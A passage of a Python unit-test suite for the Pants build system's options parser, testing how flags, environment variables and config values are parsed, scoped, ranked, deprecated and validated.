global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.shell_str_listy == expected
default = ["--default1", "--default2=test"]
specified_args = ["arg1", "arg2=foo", "--arg3"]
all_args = [*default, *specified_args]
check(expected=default)
check(
flags="--shell-str-listy='arg1 arg2=foo' --shell-str-listy='--arg3'", expected=all_args
)
check(flags="""--shell-str-listy='+["arg1 arg2=foo", "--arg3"]'""", expected=all_args)
check(flags="""--shell-str-listy='["arg1 arg2=foo", "--arg3"]'""", expected=specified_args)
check(env_val="arg1 arg2=foo --arg3", expected=all_args)
check(env_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
check(env_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
check(config_val="arg1 arg2=foo --arg3", expected=all_args)
check(config_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
check(config_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
def test_dict_option(self) -> None:
def check(
*, expected: Dict[str, str], flags: str = "", config_val: Optional[str] = None,
) -> None:
config = {"GLOBAL": {"dicty": config_val}} if config_val else None
global_options = self._parse(flags=flags, config=config).for_global_scope()
assert global_options.dicty == expected
default = {"a": "b"}
specified_args = {"c": "d"}
all_args = {**default, **specified_args}
check(expected=default)
check(flags='--dicty=\'{"c": "d"}\'', expected=specified_args)
check(flags='--dicty=\'+{"c": "d"}\'', expected=all_args)
check(config_val='{"c": "d"}', expected=specified_args)
check(config_val='+{"c": "d"}', expected=all_args)
check(
config_val='+{"c": "d"}',
flags='--dicty=\'+{"e": "f"}\'',
expected={**all_args, "e": "f"},
)
# Check that highest rank wins if we have multiple values for the same key.
check(config_val='+{"a": "b+", "c": "d"}', expected={"a": "b+", "c": "d"})
check(
config_val='+{"a": "b+", "c": "d"}',
flags='--dicty=\'+{"a": "b++"}\'',
expected={"a": "b++", "c": "d"},
)
def test_defaults(self) -> None:
# Hard-coded defaults.
options = self._parse(flags="compile.java -n33")
self.assertEqual(99, options.for_global_scope().num)
self.assertEqual(99, options.for_scope("compile").num)
self.assertEqual(33, options.for_scope("compile.java").num)
self.assertEqual(99, options.for_scope("test").num)
self.assertEqual(99, options.for_scope("test.junit").num)
options = self._parse(flags="compile -n22 compile.java -n33")
self.assertEqual(99, options.for_global_scope().num)
self.assertEqual(22, options.for_scope("compile").num)
self.assertEqual(33, options.for_scope("compile.java").num)
# Get defaults from config and environment.
config = {"DEFAULT": {"num": "88"}, "compile": {"num": "77"}, "compile.java": {"num": "66"}}
options = self._parse(flags="compile.java -n22", config=config)
self.assertEqual(88, options.for_global_scope().num)
self.assertEqual(77, options.for_scope("compile").num)
self.assertEqual(22, options.for_scope("compile.java").num)
env = {"PANTS_COMPILE_NUM": "55"}
options = self._parse(flags="compile", env=env, config=config)
self.assertEqual(88, options.for_global_scope().num)
self.assertEqual(55, options.for_scope("compile").num)
self.assertEqual(55, options.for_scope("compile.java").num)
options = self._parse(flags="compile.java -n44", env=env, config=config)
self.assertEqual(88, options.for_global_scope().num)
self.assertEqual(55, options.for_scope("compile").num)
self.assertEqual(44, options.for_scope("compile.java").num)
def test_choices(self) -> None:
options = self._parse(flags="--str-choices=foo")
self.assertEqual("foo", options.for_global_scope().str_choices)
options = self._parse(config={"DEFAULT": {"str_choices": "bar"}})
self.assertEqual("bar", options.for_global_scope().str_choices)
with self.assertRaises(ParseError):
options = self._parse(flags="--str-choices=baz")
options.for_global_scope()
with self.assertRaises(ParseError):
options = self._parse(config={"DEFAULT": {"str_choices": "baz"}})
options.for_global_scope()
options = self._parse(flags="--int-choices=42 --int-choices=99")
self.assertEqual([42, 99], options.for_global_scope().int_choices)
def test_parse_name_and_dest(self) -> None:
self.assertEqual(("thing", "thing"), Parser.parse_name_and_dest("--thing"))
self.assertEqual(
("thing", "other_thing"), Parser.parse_name_and_dest("--thing", dest="other_thing")
)
def test_validation(self) -> None:
def assertError(expected_error, *args, **kwargs):
with self.assertRaises(expected_error):
options = Options.create(
args=[],
env={},
config=self._create_config(),
known_scope_infos=[global_scope()],
)
options.register(GLOBAL_SCOPE, *args, **kwargs)
options.for_global_scope()
assertError(NoOptionNames)
assertError(OptionNameDash, "badname")
assertError(OptionNameDoubleDash, "-badname")
assertError(InvalidKwarg, "--foo", badkwarg=42)
assertError(ImplicitValIsNone, "--foo", implicit_value=None)
assertError(BooleanOptionNameWithNo, "--no-foo", type=bool)
assertError(MemberTypeNotAllowed, "--foo", member_type=int)
assertError(MemberTypeNotAllowed, "--foo", type=dict, member_type=int)
assertError(InvalidMemberType, "--foo", type=list, member_type=set)
assertError(InvalidMemberType, "--foo", type=list, member_type=list)
assertError(InvalidMemberType, "--foo", type=list, member_type=list)
def test_implicit_value(self) -> None:
def check(*, flag: str = "", expected: str) -> None:
options = self._parse(flags=flag)
assert options.for_global_scope().implicit_valuey == expected
check(expected="default")
check(flag="--implicit-valuey", expected="implicit")
check(flag="--implicit-valuey=explicit", expected="explicit")
def test_shadowing(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("bar"), intermediate("foo"), task("foo.bar")],
args=["./pants"],
)
options.register("", "--opt1")
options.register("foo", "-o", "--opt2")
def assert_raises_shadowing(*, scope: str, args: List[str]) -> None:
with self.assertRaises(Shadowing):
options.register(scope, *args)
assert_raises_shadowing(scope="", args=["--opt2"])
assert_raises_shadowing(scope="bar", args=["--opt1"])
assert_raises_shadowing(scope="foo.bar", args=["--opt1"])
assert_raises_shadowing(scope="foo.bar", args=["--opt2"])
assert_raises_shadowing(scope="foo.bar", args=["--opt1", "--opt3"])
assert_raises_shadowing(scope="foo.bar", args=["--opt3", "--opt2"])
def test_recursion(self) -> None:
# Recursive option.
options = self._parse(flags="-n=5 compile -n=6")
self.assertEqual(5, options.for_global_scope().num)
self.assertEqual(6, options.for_scope("compile").num)
# Non-recursive option.
options = self._parse(flags="--bar-baz=foo")
self.assertEqual("foo", options.for_global_scope().bar_baz)
options = self._parse(flags="compile --bar-baz=foo")
with self.assertRaises(ParseError):
options.for_scope("compile")
def test_no_recursive_subsystem_options(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), subsystem("foo")],
args=["./pants"],
)
# All subsystem options are implicitly recursive (a subscope of subsystem scope represents
# a separate instance of the subsystem, so it needs all the options).
# We disallow explicit specification of recursive (even if set to True), to avoid confusion.
with self.assertRaises(RecursiveSubsystemOption):
options.register("foo", "--bar", recursive=False)
options.for_scope("foo")
with self.assertRaises(RecursiveSubsystemOption):
options.register("foo", "--baz", recursive=True)
options.for_scope("foo")
def test_is_known_scope(self) -> None:
options = self._parse()
for scope_info in self._known_scope_infos:
self.assertTrue(options.is_known_scope(scope_info.scope))
self.assertFalse(options.is_known_scope("nonexistent_scope"))
def test_designdoc_example(self) -> None:
# The example from the design doc.
# Get defaults from config and environment.
config = {
"DEFAULT": {"b": "99"},
"compile": {"a": "88", "c": "77"},
}
env = {"PANTS_COMPILE_C": "66"}
options = self._parse(
flags="--a=1 compile --b=2 compile.java --a=3 --c=4", env=env, config=config,
)
self.assertEqual(1, options.for_global_scope().a)
self.assertEqual(99, options.for_global_scope().b)
with self.assertRaises(AttributeError):
options.for_global_scope().c
self.assertEqual(1, options.for_scope("compile").a)
self.assertEqual(2, options.for_scope("compile").b)
self.assertEqual(66, options.for_scope("compile").c)
self.assertEqual(3, options.for_scope("compile.java").a)
self.assertEqual(2, options.for_scope("compile.java").b)
self.assertEqual(4, options.for_scope("compile.java").c)
def test_file_spec_args(self) -> None:
with temporary_file(binary_mode=False) as tmp:
tmp.write(
dedent(
"""
foo
bar
"""
)
)
tmp.flush()
# Note that we prevent loading a real pants.toml during get_bootstrap_options().
flags = f'--spec-file={tmp.name} --pants-config-files="[]" compile morx:tgt fleem:tgt'
bootstrapper = OptionsBootstrapper.create(args=shlex.split(f"./pants {flags}"))
bootstrap_options = bootstrapper.bootstrap_options.for_global_scope()
options = self._parse(flags=flags, bootstrap_option_values=bootstrap_options)
sorted_specs = sorted(options.specs)
self.assertEqual(["bar", "fleem:tgt", "foo", "morx:tgt"], sorted_specs)
def test_passthru_args_subsystems_and_goals(self):
# Test that passthrough args are applied.
options = self._parse(flags="")
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("test"), subsystem("passconsumer")],
args=["./pants", "test", "target", "--", "bar", "--baz"],
)
options.register(
"passconsumer", "--passthing", passthrough=True, type=list, member_type=str
)
self.assertEqual(["bar", "--baz"], options.for_scope("passconsumer").passthing)
def test_at_most_one_goal_with_passthru_args(self):
with self.assertRaisesWithMessageContaining(
Options.AmbiguousPassthroughError,
"""Specifying multiple goals (in this case: ['test', 'fmt']) """
"""along with passthrough args (args after `--`) is ambiguous.""",
):
_ = Options.create(
env={},
config={},
known_scope_infos=[global_scope(), task("test"), task("fmt")],
args=["./pants", "test", "fmt", "target", "--", "bar", "--baz"],
)
def test_global_scope_env_vars(self):
def check_pants_foo(expected_val, env):
val = self._parse(env=env).for_global_scope().pants_foo
self.assertEqual(expected_val, val)
check_pants_foo(
"AAA", {"PANTS_GLOBAL_PANTS_FOO": "AAA", "PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"}
)
check_pants_foo("BBB", {"PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"})
check_pants_foo("CCC", {"PANTS_FOO": "CCC"})
check_pants_foo(None, {})
# Check that an empty string is distinct from no value being specified.
check_pants_foo("", {"PANTS_PANTS_FOO": "", "PANTS_FOO": "CCC"})
# A global option that doesn't begin with 'pants-': Setting BAR_BAZ should have no effect.
def check_bar_baz(expected_val, env):
val = self._parse(env=env).for_global_scope().bar_baz
self.assertEqual(expected_val, val)
check_bar_baz(
"AAA", {"PANTS_GLOBAL_BAR_BAZ": "AAA", "PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"}
)
check_bar_baz("BBB", {"PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"})
check_bar_baz(None, {"BAR_BAZ": "CCC"})
check_bar_baz(None, {})
def test_scoped_env_vars(self) -> None:
def check_scoped_spam(scope, expected_val, env):
val = self._parse(env=env).for_scope(scope).spam
self.assertEqual(expected_val, val)
check_scoped_spam("simple", "value", {"PANTS_SIMPLE_SPAM": "value"})
check_scoped_spam("simple-dashed", "value", {"PANTS_SIMPLE_DASHED_SPAM": "value"})
check_scoped_spam("scoped.a.bit", "value", {"PANTS_SCOPED_A_BIT_SPAM": "value"})
check_scoped_spam("scoped.and-dashed", "value", {"PANTS_SCOPED_AND_DASHED_SPAM": "value"})
def test_drop_flag_values(self) -> None:
options = self._parse(
flags="--bar-baz=fred -n33 --pants-foo=red enum-opt --some-enum=another-value simple -n1",
env={"PANTS_FOO": "BAR"},
config={"simple": {"num": 42}, "enum-opt": {"some-enum": "a-value"}},
)
defaulted_only_options = options.drop_flag_values()
# No option value supplied in any form.
self.assertEqual("fred", options.for_global_scope().bar_baz)
self.assertIsNone(defaulted_only_options.for_global_scope().bar_baz)
# A defaulted option value.
self.assertEqual(33, options.for_global_scope().num)
self.assertEqual(99, defaulted_only_options.for_global_scope().num)
# A config specified option value.
self.assertEqual(1, options.for_scope("simple").num)
self.assertEqual(42, defaulted_only_options.for_scope("simple").num)
# An env var specified option value.
self.assertEqual("red", options.for_global_scope().pants_foo)
self.assertEqual("BAR", defaulted_only_options.for_global_scope().pants_foo)
# Overriding an enum option value.
self.assertEqual(self.SomeEnumOption.another_value, options.for_scope("enum-opt").some_enum)
# Getting the default value for an enum option.
self.assertEqual(
self.SomeEnumOption.a_value,
defaulted_only_options.for_scope("separate-enum-opt-scope").some_enum_with_default,
)
def test_enum_option_type_parse_error(self) -> None:
self.maxDiff = None
with self.assertRaisesWithMessageContaining(
ParseError,
"Error applying type 'SomeEnumOption' to option value 'invalid-value', for option "
"'--some_enum' in scope 'enum-opt'",
):
options = self._parse(flags="enum-opt --some-enum=invalid-value")
options.for_scope("enum-opt").some_enum
def assertOptionWarning(self, w, option_string):
single_warning = assert_single_element(w)
self.assertEqual(single_warning.category, DeprecationWarning)
warning_message = str(single_warning.message)
self.assertIn("will be removed in version", warning_message)
self.assertIn(option_string, warning_message)
def test_deprecated_options(self) -> None:
def assert_deprecation_triggered(
*,
flags: str = "",
option: str,
expected: Union[str, bool],
scope: Optional[str] = None,
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
with self.warnings_catcher() as w:
options = self._parse(flags=flags, env=env, config=config)
scoped_options = (
options.for_global_scope() if not scope else options.for_scope(scope)
)
assert getattr(scoped_options, option) == expected
self.assertOptionWarning(w, option)
assert_deprecation_triggered(
flags="--global-crufty=crufty1", option="global_crufty", expected="crufty1",
)
assert_deprecation_triggered(
flags="--global-crufty-boolean", option="global_crufty_boolean", expected=True,
)
assert_deprecation_triggered(
flags="--no-global-crufty-boolean", option="global_crufty_boolean", expected=False,
)
assert_deprecation_triggered(
flags="stale --crufty=stale_and_crufty",
scope="stale",
option="crufty",
expected="stale_and_crufty",
)
assert_scoped_boolean_deprecation = partial(
assert_deprecation_triggered, scope="stale", option="crufty_boolean"
)
assert_scoped_boolean_deprecation(flags="stale --crufty-boolean", expected=True)
assert_scoped_boolean_deprecation(flags="stale --no-crufty-boolean", expected=False)
assert_scoped_boolean_deprecation(flags="--stale-crufty-boolean", expected=True)
assert_scoped_boolean_deprecation(flags="--no-stale-crufty-boolean", expected=False)
assert_deprecation_triggered(
env={"PANTS_GLOBAL_CRUFTY": "crufty1"}, option="global_crufty", expected="crufty1",
)
assert_deprecation_triggered(
env={"PANTS_STALE_CRUFTY": "stale_and_crufty"},
scope="stale",
option="crufty",
expected="stale_and_crufty",
)
assert_deprecation_triggered(
config={"GLOBAL": {"global_crufty": "crufty1"}},
option="global_crufty",
expected="crufty1",
)
assert_deprecation_triggered(
config={"stale": {"crufty": "stale_and_crufty"}},
scope="stale",
option="crufty",
expected="stale_and_crufty",
)
# Make sure the warnings don't come out for regular options.
with self.warnings_catcher() as w:
self._parse(flags="stale --pants-foo stale --still-good")
self.assertEqual(0, len(w))
@unittest.mock.patch("pants.base.deprecated.PANTS_SEMVER", Version(_FAKE_CUR_VERSION))
def test_delayed_deprecated_option(self) -> None:
with self.warnings_catcher() as w:
delayed_deprecation_option_value = (
self._parse(flags="--global-delayed-deprecated-option=xxx")
.for_global_scope()
.global_delayed_deprecated_option
)
self.assertEqual(delayed_deprecation_option_value, "xxx")
self.assertEqual(0, len(w))
with self.warnings_catcher() as w:
delayed_passed_option_value = (
self._parse(flags="--global-delayed-but-already-passed-deprecated-option=xxx")
.for_global_scope()
.global_delayed_but_already_passed_deprecated_option
)
self.assertEqual(delayed_passed_option_value, "xxx")
self.assertOptionWarning(w, "global_delayed_but_already_passed_deprecated_option")
def test_mutually_exclusive_options(self) -> None:
"""Ensure error is raised when mutual exclusive options are given together."""
def assert_mutually_exclusive_raised(
*,
flags: str,
scope: Optional[str] = None,
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
with self.assertRaises(MutuallyExclusiveOptionError):
options = self._parse(flags=flags, env=env, config=config)
if scope:
options.for_scope(scope)
else:
options.for_global_scope()
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar")
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--mutex-bar=bar --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
assert_mutually_exclusive_raised(flags="stale --mutex-a=foo --mutex-b=bar", scope="stale")
assert_mutually_exclusive_raised(
flags="stale --crufty-new=foo --crufty-old=bar", scope="stale"
)
assert_mutually_exclusive_raised(flags="--mutex-foo=foo", env={"PANTS_MUTEX_BAR": "bar"})
assert_mutually_exclusive_raised(flags="--new-name=foo", env={"PANTS_OLD_NAME": "bar"})
assert_mutually_exclusive_raised(
flags="stale --mutex-a=foo", env={"PANTS_STALE_MUTEX_B": "bar"}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="stale --crufty-new=foo", env={"PANTS_STALE_CRUFTY_OLD": "bar"}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="--mutex-foo=foo", config={"GLOBAL": {"mutex_bar": "bar"}},
)
assert_mutually_exclusive_raised(
flags="--new-name=foo", config={"GLOBAL": {"old_name": "bar"}},
)
assert_mutually_exclusive_raised(
flags="stale --mutex-a=foo", config={"stale": {"mutex_b": "bar"}}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="stale --crufty-old=foo", config={"stale": {"crufty_new": "bar"}}, scope="stale",
)
def assert_other_option_also_set(
*,
flags: str = "",
other_option: str,
scope: Optional[str] = None,
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
options = self._parse(flags=flags, env=env, config=config)
scoped_options = options.for_global_scope() if not scope else options.for_scope(scope)
assert getattr(scoped_options, other_option) == "orz"
assert_other_option_also_set(flags="--mutex-foo=orz", other_option="mutex")
assert_other_option_also_set(flags="--old-name=orz", other_option="new_name")
assert_other_option_also_set(
flags="stale --mutex-a=orz", other_option="crufty_mutex", scope="stale",
)
assert_other_option_also_set(
flags="stale --crufty-old=orz", other_option="crufty_new", scope="stale",
)
assert_other_option_also_set(env={"PANTS_GLOBAL_MUTEX_BAZ": "orz"}, other_option="mutex")
assert_other_option_also_set(env={"PANTS_OLD_NAME": "orz"}, other_option="new_name")
assert_other_option_also_set(
env={"PANTS_STALE_MUTEX_B": "orz"}, other_option="crufty_mutex", scope="stale",
)
assert_other_option_also_set(
config={"stale": {"crufty_old": "orz"}}, other_option="crufty_new", scope="stale",
)
def test_middle_scoped_options(self) -> None:
"""Make sure the rules for inheriting from a hierarchy of scopes.
Values should follow
1. A short circuit scan for a value from the following sources in-order:
flags, env, config, hardcoded defaults
2. Values for each source follow the . hierarchy scoping rule
within that source.
"""
# Short circuit using command line.
options = self._parse(flags="--a=100 compile --a=99")
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
options = self._parse(config={"DEFAULT": {"a": 100}, "compile": {"a": 99}})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
options = self._parse(env={"PANTS_A": "100", "PANTS_COMPILE_A": "99"})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
# Command line has precedence over config.
options = self._parse(flags="compile --a=99", config={"DEFAULT": {"a": 100}})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
# Command line has precedence over environment.
options = self._parse(flags="compile --a=99", env={"PANTS_A": "100"})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
# Env has precedence over config.
options = self._parse(config={"DEFAULT": {"a": 100}}, env={"PANTS_COMPILE_A": "99"})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
# Command line global overrides the middle scope setting in then env.
options = self._parse(flags="--a=100", env={"PANTS_COMPILE_A": "99"})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(100, options.for_scope("compile").a)
self.assertEqual(100, options.for_scope("compile.java").a)
# Command line global overrides the middle scope in config.
options = self._parse(flags="--a=100 ", config={"compile": {"a": 99}})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(100, options.for_scope("compile").a)
self.assertEqual(100, options.for_scope("compile.java").a)
# Env global overrides the middle scope in config.
options = self._parse(
flags="--a=100 ", config={"compile": {"a": 99}}, env={"PANTS_A": "100"}
)
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(100, options.for_scope("compile").a)
self.assertEqual(100, options.for_scope("compile.java").a)
def test_complete_scopes(self) -> None:
self.assertEqual(
{intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
set(Options.complete_scopes({task("foo.bar.baz")})),
)
self.assertEqual(
{global_scope(), intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
set(Options.complete_scopes({GlobalOptions.get_scope_info(), task("foo.bar.baz")})),
)
self.assertEqual(
{intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
set(Options.complete_scopes({intermediate("foo"), task("foo.bar.baz")})),
)
self.assertEqual(
{
intermediate("foo"),
intermediate("foo.bar"),
task("foo.bar.baz"),
intermediate("qux"),
task("qux.quux"),
},
set(Options.complete_scopes({task("foo.bar.baz"), task("qux.quux")})),
)
def test_get_fingerprintable_for_scope(self) -> None:
# Note: tests handling recursive and non-recursive options from enclosing scopes correctly.
options = self._parse(
flags='--store-true-flag --num=88 compile.scala --num=77 --modifycompile="blah blah blah" '
'--modifylogs="durrrr" -- -d -v'
)
# NB: Passthrough args end up on our `--modifypassthrough` arg.
pairs = options.get_fingerprintable_for_scope("compile.scala")
self.assertEqual(
[(str, "blah blah blah"), (str, ["-d", "-v"]), (bool, True), (int, 77)], pairs
)
def test_fingerprintable(self) -> None:
options = self._parse(
flags="fingerprinting --fingerprinted=shall_be_fingerprinted "
"--definitely-not-fingerprinted=shant_be_fingerprinted"
)
pairs = options.get_fingerprintable_for_scope("fingerprinting")
self.assertIn((str, "shall_be_fingerprinted"), pairs)
self.assertNotIn((str, "shant_be_fingerprinted"), pairs)
def test_fingerprintable_inverted(self) -> None:
options = self._parse(
flags="fingerprinting --inverted=shall_be_fingerprinted "
"--definitely-not-inverted=shant_be_fingerprinted"
)
pairs = options.get_fingerprintable_for_scope(
"fingerprinting", fingerprint_key="daemon", invert=True
)
self.assertIn((str, "shall_be_fingerprinted"), pairs)
self.assertNotIn((str, "shant_be_fingerprinted"), pairs)
def assert_fromfile(self, parse_func, expected_append=None, append_contents=None):
def _do_assert_fromfile(dest, expected, contents):
with temporary_file(binary_mode=False) as fp:
fp.write(contents)
fp.close()
options = parse_func(dest, fp.name)
self.assertEqual(expected, options.for_scope("fromfile")[dest])
_do_assert_fromfile(dest="string", expected="jake", contents="jake")
_do_assert_fromfile(dest="intvalue", expected=42, contents="42")
_do_assert_fromfile(
dest="dictvalue",
expected={"a": 42, "b": (1, 2)},
contents=dedent(
"""
{
'a': 42,
'b': (
1,
2
)
}
"""
),
)
_do_assert_fromfile(
dest="listvalue",
expected=["a", "1", "2"],
contents=dedent(
"""
['a',
1,
2]
"""
),
)
expected_append = expected_append or [1, 2, 42]
append_contents = append_contents or dedent(
"""
[
1,
2,
42
]
"""
)
_do_assert_fromfile(dest="appendvalue", expected=expected_append, contents=append_contents)
def test_fromfile_flags(self) -> None:
def parse_func(dest, fromfile):
return self._parse(flags=f"fromfile --{dest.replace('_', '-')}=@{fromfile}")
# You can only append a single item at a time with append flags, ie: we don't override the
# default list like we do with env of config. As such, send in a single append value here
# instead of a whole default list as in `test_fromfile_config` and `test_fromfile_env`.
self.assert_fromfile(parse_func, expected_append=[42], append_contents="42")
def test_fromfile_config(self) -> None:
def parse_func(dest, fromfile):
return self._parse(flags="fromfile", config={"fromfile": {dest: f"@{fromfile}"}})
self.assert_fromfile(parse_func)
def test_fromfile_env(self) -> None:
def parse_func(dest, fromfile):
return self._parse(
flags="fromfile", env={f"PANTS_FROMFILE_{dest.upper()}": f"@{fromfile}"}
)
self.assert_fromfile(parse_func)
def test_fromfile_json(self) -> None:
val = {"a": {"b": 1}, "c": [2, 3]}
with temporary_file(suffix=".json", binary_mode=False) as fp:
json.dump(val, fp)
fp.close()
options = self._parse(flags=f"fromfile --{'dictvalue'}=@{fp.name}")
self.assertEqual(val, options.for_scope("fromfile")["dictvalue"])
def test_fromfile_yaml(self) -> None:
val = {"a": {"b": 1}, "c": [2, 3]}
with temporary_file(suffix=".yaml", binary_mode=False) as fp:
yaml.safe_dump(val, fp)
fp.close()
options = self._parse(flags=f"fromfile --{'dictvalue'}=@{fp.name}")
self.assertEqual(val, options.for_scope("fromfile")["dictvalue"])
def test_fromfile_error(self) -> None:
options = self._parse(flags="fromfile --string=@/does/not/exist")
with self.assertRaises(FromfileError):
options.for_scope("fromfile")
def test_fromfile_escape(self) -> None:
options = self._parse(flags=r"fromfile --string=@@/does/not/exist")
self.assertEqual("@/does/not/exist", options.for_scope("fromfile").string)
def test_ranked_value_equality(self) -> None:
none = RankedValue(Rank.NONE, None)
some = RankedValue(Rank.HARDCODED, "some")
self.assertEqual(RankedValue(Rank.NONE, None), none)
self.assertEqual(RankedValue(Rank.HARDCODED, "some"), some)
self.assertNotEqual(some, none)
self.assertEqual(some, RankedValue(Rank.HARDCODED, "some"))
self.assertNotEqual(some, RankedValue(Rank.HARDCODED, "few"))
self.assertNotEqual(some, RankedValue(Rank.CONFIG, "some"))
def test_pants_global_designdoc_example(self) -> None:
# The example from the design doc.
# Get defaults from config and environment.
config = {
"GLOBAL": {"b": "99"},
"compile": {"a": "88", "c": "77"},
}
env = {"PANTS_COMPILE_C": "66"}
options = self._parse(
flags="--a=1 compile --b=2 compile.java --a=3 --c=4", env=env, config=config,
)
self.assertEqual(1, options.for_global_scope().a)
self.assertEqual(99, options.for_global_scope().b)
with self.assertRaises(AttributeError):
options.for_global_scope().c
self.assertEqual(1, options.for_scope("compile").a)
self.assertEqual(2, options.for_scope("compile").b)
self.assertEqual(66, options.for_scope("compile").c)
self.assertEqual(3, options.for_scope("compile.java").a)
self.assertEqual(2, options.for_scope("compile.java").b)
self.assertEqual(4, options.for_scope("compile.java").c)
def test_invalid_option_errors(self) -> None:
self.maxDiff = None
def parse_joined_command_line(*args):
bootstrap_options = create_options(
{
GLOBAL_SCOPE: {
# Set the Levenshtein edit distance to search for misspelled options.
"option_name_check_distance": 2,
# If bootstrap option values are provided, this option is accessed and must be provided.
"spec_files": [],
},
}
)
return self._parse(
flags=safe_shlex_join(list(args)),
bootstrap_option_values=bootstrap_options.for_global_scope(),
)
with self.assertRaisesWithMessage(
ParseError,
(
"Unrecognized command line flag '--aasdf' on global scope.\n\n(Run `./pants "
"help-advanced` for all available options.)"
),
):
parse_joined_command_line("--aasdf").for_global_scope()
with self.assertRaisesWithMessage(
ParseError,
(
"Unrecognized command line flags on global scope: --aasdf, --aasdy.\n\n(Run "
"`./pants help-advanced` for all available options.)"
),
):
parse_joined_command_line("--aasdf", "--aasdy").for_global_scope()
with self.assertRaisesWithMessage(
ParseError,
dedent(
"""\
Unrecognized command line flags on global scope: -v, --config-overridden, --c.
Suggestions:
-v: [--v2, --verbose, --a, --b, --y, -n, -z, --compile-c]
--config-overridden: [--config-override]
--c: [--compile-c, --compile-scala-modifycompile, --compile-scala-modifylogs, --compile-scala-modifypassthrough, --config-override, --a, --b, --y, -n, -z, --v2]
(Run `./pants help-advanced` for all available options.)"""
),
):
parse_joined_command_line(
# A nonexistent short-form option -- other short-form options should be displayed.
"-vd",
# An incorrect form of `--config-override=val` (`ridden` instead of `ride`) should
# show the correct option name.
"--config-overridden=val",
# An option name without the correct prefix scope should match all flags with the
# same or similar unscoped option names.
"--c=[]",
).for_global_scope()
# Test when only some flags have suggestsions.
with self.assertRaisesWithMessage(
ParseError,
(
"Unrecognized command line flags on global scope: --aasdf, --config-overridden.\n"
"Suggestions:\n"
"--config-overridden: [--config-override]\n\n"
"(Run `./pants help-advanced` for all available options.)"
),
):
parse_joined_command_line("--aasdf", "--config-overridden").for_global_scope()
with self.assertRaisesWithMessage(
ParseError,
dedent(
"""\
Unrecognized command line flag '--sam' on scope 'simple'. Suggestions:
--simple-spam, --simple-dashed-spam, --a, --num, --scoped-a-bit-spam, --scoped-and-dashed-spam
(Run `./pants help-advanced simple` for all available options.)"""
),
):
parse_joined_command_line(
# Verify that misspelling searches work for options in non-global scopes.
"--simple-sam=val",
).for_scope("simple")
with self.assertRaisesWithMessage(
ParseError,
dedent(
"""\
Unrecognized command line flag '--modifylogs' on scope 'compile'. Suggestions:
--compile-scala-modifylogs
(Run `./pants help-advanced compile` for all available options.)"""
),
):
parse_joined_command_line(
# Verify that options with too shallow scoping match the correct option.
"--compile-modifylogs=val",
).for_scope("compile")
with self.assertRaisesWithMessage(
ParseError,
dedent(
"""\
Unrecognized command line flag '--modifylogs' on scope 'cache.compile.scala'.
Suggestions:
--compile-scala-modifylogs
(Run `./pants help-advanced cache.compile.scala` for all available options.)"""
),
):
parse_joined_command_line(
# Verify that options with too deep scoping match the correct option.
"--cache-compile-scala-modifylogs=val",
).for_scope("cache.compile.scala")
def test_pants_global_with_default(self) -> None:
"""This test makes sure values under [DEFAULT] still gets read."""
# This cast shouldn't be necessary - likely a bug in MyPy. Once this gets fixed, MyPy will
# tell us that we can remove the cast.
config = cast(
Dict[str, Dict[str, Any]], {"DEFAULT": {"b": "99"}, "GLOBAL": {"store_true_flag": True}}
)
global_options = self._parse(config=config).for_global_scope()
self.assertEqual(99, global_options.b)
self.assertTrue(global_options.store_true_flag)
def test_double_registration(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=OptionsTest._known_scope_infos,
args=shlex.split("./pants"),
)
options.register(GLOBAL_SCOPE, "--foo-bar")
with self.assertRaises(OptionAlreadyRegistered):
options.register(GLOBAL_SCOPE, "--foo-bar")
def test_enum_serializability(self) -> None:
# We serialize options to JSON e.g., when uploading stats.
# This test spot-checks that enum types can be serialized.
options = self._parse(flags="enum-opt --some-enum=another-value")
